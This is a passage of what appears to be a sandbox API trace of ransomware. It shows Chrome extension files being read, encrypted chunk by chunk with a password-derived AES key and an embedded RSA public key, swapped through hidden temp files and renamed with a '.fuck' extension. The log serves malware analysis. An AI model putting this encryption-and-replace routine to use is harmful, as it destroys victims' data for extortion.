lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.424] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.424] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.424] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.424] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.424] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.425] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.425] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.425] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.425] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.425] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x317, lpOverlapped=0x0) returned 1 [0261.425] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x317, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x320) returned 1 [0261.425] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x320, lpOverlapped=0x0) returned 1 [0261.425] CloseHandle (hObject=0x5d64) returned 1 [0261.425] CloseHandle (hObject=0x5d50) returned 1 [0261.426] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), bFailIfExists=0) returned 1 [0261.430] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js", dwFileAttributes=0x0) returned 1 [0261.431] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.gsg")) returned 1 [0261.432] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.fuck")) returned 1 [0261.433] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.433] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0261.433] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.433] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.433] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0261.444] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.444] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.445] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.445] GetLastError () returned 0x0 [0261.445] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css")) returned 0x20 [0261.446] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css", dwFileAttributes=0x80) returned 1 [0261.446] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.447] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.447] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.gsg", dwFileAttributes=0x2) returned 1 [0261.448] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.450] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.450] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.450] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.450] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7de80) returned 1 [0261.450] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.450] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.450] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e71b68) returned 1 [0261.451] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71b68, dwCertEncodingType=0x1, pInfo=0x2eaba20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaba50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaba58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7db00) returned 1 [0261.451] CryptEncrypt (in: hKey=0x2e7db00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.451] CryptEncrypt (in: hKey=0x2e7db00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e717b0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e717b0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.451] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e717b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e717b0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.452] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.463] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.464] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.476] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.476] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.476] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.476] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.477] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.477] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.477] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.477] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.477] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.477] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x19d, lpOverlapped=0x0) returned 1 [0261.477] CryptEncrypt (in: hKey=0x2e7de80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x19d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x1a0) returned 1 [0261.477] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x1a0, lpOverlapped=0x0) returned 1 [0261.477] CloseHandle (hObject=0x5d64) returned 1 [0261.478] CloseHandle (hObject=0x5d60) returned 1 [0261.478] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), bFailIfExists=0) returned 1 [0261.480] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css", dwFileAttributes=0x0) returned 1 [0261.480] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.gsg")) returned 1 [0261.482] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.fuck")) returned 1 [0261.483] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.483] CryptDestroyKey (hKey=0x2e7de80) returned 1 [0261.483] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.483] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.483] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.483] GetLastError () returned 0x0 [0261.483] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js")) returned 0x20 [0261.483] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js", dwFileAttributes=0x80) returned 1 [0261.484] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 